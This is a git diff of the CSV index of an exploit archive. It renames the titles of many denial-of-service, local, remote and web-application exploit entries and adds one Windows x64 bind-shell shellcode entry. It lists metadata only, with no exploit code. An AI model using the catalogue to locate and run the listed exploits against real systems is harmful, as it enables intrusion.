diff --git a/files.csv b/files.csv index 2ffdba004..c31b137cb 100644 --- a/files.csv +++ b/files.csv @@ -1453,7 +1453,7 @@ id,file,description,date,author,platform,type,port 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)",2010-03-30,ITSecTeam,windows,dos,0 11959,platforms/windows/dos/11959.pl,"Xilisoft BlackBerry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,windows,dos,0 11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 -11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - Exploit (1)",2010-03-30,"Richard leahy",windows,dos,0 +11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' PoC",2010-03-30,"Richard leahy",windows,dos,0 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' SEH (PoC)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0 @@ -2231,7 +2231,7 @@ id,file,description,date,author,platform,type,port 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0 19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 -19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (1)",1999-07-03,Coolio,windows,dos,0 +19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19181,platforms/windows/dos/19181.txt,"XnView - '.RAS' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 @@ -2279,8 +2279,8 @@ id,file,description,date,author,platform,type,port 19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0 19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 -19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (2)",1999-07-03,klepto,windows,dos,0 -19415,platforms/windows/dos/19415.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (3)",1999-04-06,"Rob Mosher",windows,dos,0 +19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (2)",1999-07-03,klepto,windows,dos,0 +19415,platforms/windows/dos/19415.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (3)",1999-04-06,"Rob Mosher",windows,dos,0 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",windows,dos,0 19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos,0 @@ -2304,7 +2304,7 @@ id,file,description,date,author,platform,type,port 19562,platforms/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",windows,dos,0 19563,platforms/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",windows,dos,0 19564,platforms/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service",1999-10-21,MSG.Net,bsd,dos,0 -19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (1)",1999-10-28,"Alberto Soli",windows,dos,0 +19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (PoC)",1999-10-28,"Alberto Soli",windows,dos,0 19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 - RCPT TO Denial of Service",1999-10-28,"Nobuo Miwa",multiple,dos,0 19575,platforms/windows/dos/19575.txt,".NET Framework - Tilde Character Denial of Service",2012-07-04,"Soroush Dalili",windows,dos,0 19577,platforms/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (1)",1999-10-31,nas,windows,dos,0 @@ -2444,8 +2444,8 @@ id,file,description,date,author,platform,type,port 20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0 20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",hardware,dos,0 20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0 -20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (1)",1998-03-16,Rootshell,hardware,dos,0 -20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (2)",1998-03-17,Rootshell,hardware,dos,0 +20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,hardware,dos,0 +20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (Perl)",1998-03-17,Rootshell,hardware,dos,0 20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",multiple,dos,0 20373,platforms/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,hp-ux,dos,0 20376,platforms/unix/dos/20376.txt,"Wietse Venema Rpcbind Replacement 2.1 - Denial of Service",1998-11-13,"Patrick Gilbert",unix,dos,0 @@ -2542,7 +2542,7 @@ id,file,description,date,author,platform,type,port 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - SEH 0verwrite",2012-08-29,Ciph3r,windows,dos,0 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0 -20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (1)",2001-06-18,Ps0,windows,dos,0 +20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0 20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service",2001-06-21,"NERF Security",windows,dos,0 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String (1)",2001-06-21,"Luca Ercoli",linux,dos,0 @@ -3007,7 +3007,7 @@ id,file,description,date,author,platform,type,port 23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,windows,dos,0 23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service",2003-10-26,"Marc Schoenefeld",multiple,dos,0 23293,platforms/windows/dos/23293.txt,"Yahoo! Messenger 5.6 - File Transfer Buffer Overrun",2003-10-27,"Hat-Squad Security Team",windows,dos,0 -23305,platforms/linux/dos/23305.c,"thttpd 2.2x - defang Remote Buffer Overflow (1)",2003-10-27,"Joel Soderberg",linux,dos,0 +23305,platforms/linux/dos/23305.c,"thttpd 2.2x - defang Remote Buffer Overflow (PoC)",2003-10-27,"Joel Soderberg",linux,dos,0 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos,0 23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service",2003-10-29,Blademaster,php,dos,0 23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 @@ -3260,7 +3260,7 @@ id,file,description,date,author,platform,type,port 24756,platforms/linux/dos/24756.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos,0 24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos,0 -24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0 +24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local / Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0 24770,platforms/windows/dos/24770.py,"Jabber Server 2.0 - Multiple Remote Buffer Overflow Vulnerabilities",2004-11-24,icbm,windows,dos,0 24775,platforms/windows/dos/24775.html,"Microsoft Internet Explorer 6 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 24776,platforms/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 - Infinite Array Sort Denial of Service",2004-11-25,"Berend-Jan Wever",windows,dos,0 @@ -3334,7 +3334,7 @@ id,file,description,date,author,platform,type,port 25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - TSShutdn.exe Remote Denial of Service",2005-03-23,"Juha-Matti Laurio",windows,dos,0 25277,platforms/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router - Remote Denial of Service",2005-03-25,"Chris Rock",hardware,dos,0 25281,platforms/windows/dos/25281.py,"Apple QuickTime 6.5.1 - PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,windows,dos,0 -25287,platforms/linux/dos/25287.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC) (1)",2005-03-28,"ilja van sprundel",linux,dos,0 +25287,platforms/linux/dos/25287.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC)",2005-03-28,"ilja van sprundel",linux,dos,0 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0 25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 25322,platforms/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,linux,dos,0 @@ -5503,7 +5503,7 @@ id,file,description,date,author,platform,type,port 919,platforms/windows/local/919.c,"FireFly 1.0 - Local Proxy Password Disclosure",2005-04-07,Kozan,windows,local,0 920,platforms/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure",2005-04-07,Kozan,windows,local,0 924,platforms/linux/local/924.c,"sash 3.7 - Local Buffer Overflow",2005-04-08,lammat,linux,local,0 -926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (3)",2005-10-26,qobaiashi,linux,local,0 +926,platforms/linux/local/926.c,"Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-10-26,qobaiashi,linux,local,0 927,platforms/windows/local/927.c,"Microsoft Jet Database - 'msjet40.dll' DB File Buffer Overflow",2005-04-11,"Stuart Pearson",windows,local,0 929,platforms/windows/local/929.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell Exploit (1)",2005-04-12,"Tal Zeltzer",windows,local,0 932,platforms/windows/local/932.sql,"Oracle Database Server 10.1.0.2 - Buffer Overflow",2005-04-13,"Esteban Fayo",windows,local,0 @@ -6359,10 +6359,10 @@ id,file,description,date,author,platform,type,port 11953,platforms/windows/local/11953.py,"RM Downloader 3.0.2.1 - '.asx' Local Buffer Overflow (SEH)",2010-03-30,b0telh0,windows,local,0 11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0 11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow",2010-03-30,"Hazem mofeed",windows,local,0 -11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) Stack Buffer Overflow (PoC)",2010-03-31,mr_me,windows,local,0 +11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - '.wav' Stack Buffer Overflow",2010-03-31,mr_me,windows,local,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 - '.asx' Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 -12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - Exploit (2)",2010-04-02,"Richard leahy",windows,local,0 +12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Exploit",2010-04-02,"Richard leahy",windows,local,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - SEH Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0 @@ -7887,7 +7887,7 @@ id,file,description,date,author,platform,type,port 25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Privilege Escalation (1)",2005-03-09,sd,linux,local,0 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - '.lst' Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0 25256,platforms/osx/local/25256.c,"Apple Mac OSX 10.3.x - Multiple Vulnerabilities",2005-03-21,V9,osx,local,0 -25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (2)",2005-04-08,qobaiashi,linux,local,0 +25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)",2005-04-08,qobaiashi,linux,local,0 25289,platforms/linux/local/25289.c,"Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation",2005-10-19,backdoored.net,linux,local,0 25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local,0 25333,platforms/unix/local/25333.c,"SCO OpenServer 5.0.6/5.0.7 - NWPrint Command Line Argument Local Buffer Overflow",2005-04-04,"pasquale minervini",unix,local,0 @@ -8311,7 +8311,7 @@ id,file,description,date,author,platform,type,port 36424,platforms/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Privilege Escalation",2011-12-08,anonymous,linux,local,0 36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH) (Metasploit)",2015-03-19,Metasploit,windows,local,0 -36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 +36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus - '.cfg' File Memory Corruption",2011-12-21,"Vulnerability Research Laboratory",windows,local,0 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 @@ -8330,7 +8330,7 @@ id,file,description,date,author,platform,type,port 36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH Egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0 -36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 '.wav' - SEH Based Buffer Overflow (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0 +36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0 36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,local,0 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0 @@ -10842,7 +10842,7 @@ id,file,description,date,author,platform,type,port 16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)",2010-06-11,Metasploit,windows,remote,8000 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,5250 16802,platforms/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,windows,remote,0 -16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway - 'Username' Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,4000 +16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway 1.0.1 - 'Username' Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,4000 16804,platforms/windows/remote/16804.rb,"Belkin Bulldog Plus - Web Service Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager - OpenView5.exe CGI Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,80 16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow (Metasploit)",2010-07-08,Metasploit,windows,remote,0 @@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 19567,platforms/linux/remote/19567.txt,"National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure",1999-10-25,"Oezguer Kesim",linux,remote,0 19568,platforms/windows/remote/19568.txt,"pacific software url live! 1.0 - Directory Traversal",1999-10-28,UNYUN,windows,remote,0 -19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (2)",1999-11-04,"Alberto Solino",windows,remote,0 +19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow",1999-11-04,"Alberto Solino",windows,remote,0 19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle - Remote Code Execution (Metasploit)",2012-07-05,Metasploit,windows,remote,0 19580,platforms/windows/remote/19580.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (1)",1999-10-31,"Luck Martins",windows,remote,0 19581,platforms/windows/remote/19581.txt,"Avirt Gateway Suite 3.3 a/3.5 - Mail Server Buffer Overflow (2)",1999-10-31,"dark spyrit",windows,remote,0 @@ -12698,7 +12698,7 @@ id,file,description,date,author,platform,type,port 23296,platforms/linux/remote/23296.txt,"RedHat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 23298,platforms/windows/remote/23298.txt,"Macromedia Flash Player 6.0.x - Flash Cookie Predictable File Location",2003-10-24,Mindwarper,windows,remote,0 23304,platforms/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,cgi,remote,0 -23306,platforms/linux/remote/23306.c,"thttpd 2.2x - defang Remote Buffer Overflow (2)",2003-10-27,d3ck4,linux,remote,0 +23306,platforms/linux/remote/23306.c,"thttpd 2.2x - defang Remote Buffer Overflow",2003-10-27,d3ck4,linux,remote,0 23307,platforms/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting",2003-10-28,"Oliver Karow",multiple,remote,0 23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 - Input Validation",2003-10-30,"Corsaire Limited",cgi,remote,0 @@ -15591,6 +15591,7 @@ id,file,description,date,author,platform,type,port 21254,platforms/arm/shellcode/21254.asm,"Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 +40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 @@ -16048,7 +16049,7 @@ id,file,description,date,author,platform,type,port 1609,platforms/php/webapps/1609.pl,"PHP Ticket 0.71 - 'search.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 -1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - (function.php) Local File Inclusion",2006-03-26,"Hamid Ebadi",php,webapps,0 +1612,platforms/php/webapps/1612.php,"CuteNews 1.4.1 - 'function.php' Local File Inclusion",2006-03-26,"Hamid Ebadi",php,webapps,0 1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 - (myadmin.php) User Privilege Escalation",2006-03-26,Sparah,php,webapps,0 1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - 'sendpassword.php' SQL Injection",2006-03-28,rgod,php,webapps,0 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution (1)",2006-03-28,No_Face_King,php,webapps,0 @@ -16098,7 +16099,7 @@ id,file,description,date,author,platform,type,port 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - (Haberler.asp) SQL Injection",2006-04-19,nukedx,asp,webapps,0 1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0 -1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - (userid) SQL Injection",2006-04-21,nukedx,php,webapps,0 +1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - 'userid' Parameter SQL Injection",2006-04-21,nukedx,php,webapps,0 1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0 1706,platforms/php/webapps/1706.txt,"dForum 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution",2006-04-22,nukedx,php,webapps,0 @@ -16352,7 +16353,7 @@ id,file,description,date,author,platform,type,port 2097,platforms/php/webapps/2097.txt,"NewsLetter 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2098,platforms/php/webapps/2098.txt,"TSEP 0.942 - (copyright.php) Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2099,platforms/php/webapps/2099.txt,"WoW Roster 1.5.1 - (subdir) Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 -2100,platforms/php/webapps/2100.txt,"phpAuction 2.1 - (phpAds_path) Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 +2100,platforms/php/webapps/2100.txt,"phpAuction 2.1 - 'phpAds_path' Parameter Remote File Inclusion",2006-08-01,"Philipp Niedziela",php,webapps,0 2101,platforms/php/webapps/2101.txt,"newsReporter 1.1 - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2102,platforms/php/webapps/2102.txt,"Voodoo chat 1.0RC1b - (file_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 @@ -16661,7 +16662,7 @@ id,file,description,date,author,platform,type,port 2487,platforms/php/webapps/2487.php,"4Images 1.7.x - 'search.php' SQL Injection",2006-10-08,Synsta,php,webapps,0 2488,platforms/php/webapps/2488.txt,"PHPMyNews 1.4 - (cfg_include_dir) Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 2489,platforms/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - 'config.php' Remote File Inclusion",2006-10-08,Kacper,php,webapps,0 -2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - (moteur.php) Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 +2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - 'moteur.php' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - (/lib/functions.inc.php) Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 2493,platforms/php/webapps/2493.pl,"docmint 2.0 - (engine/require.php) Remote File 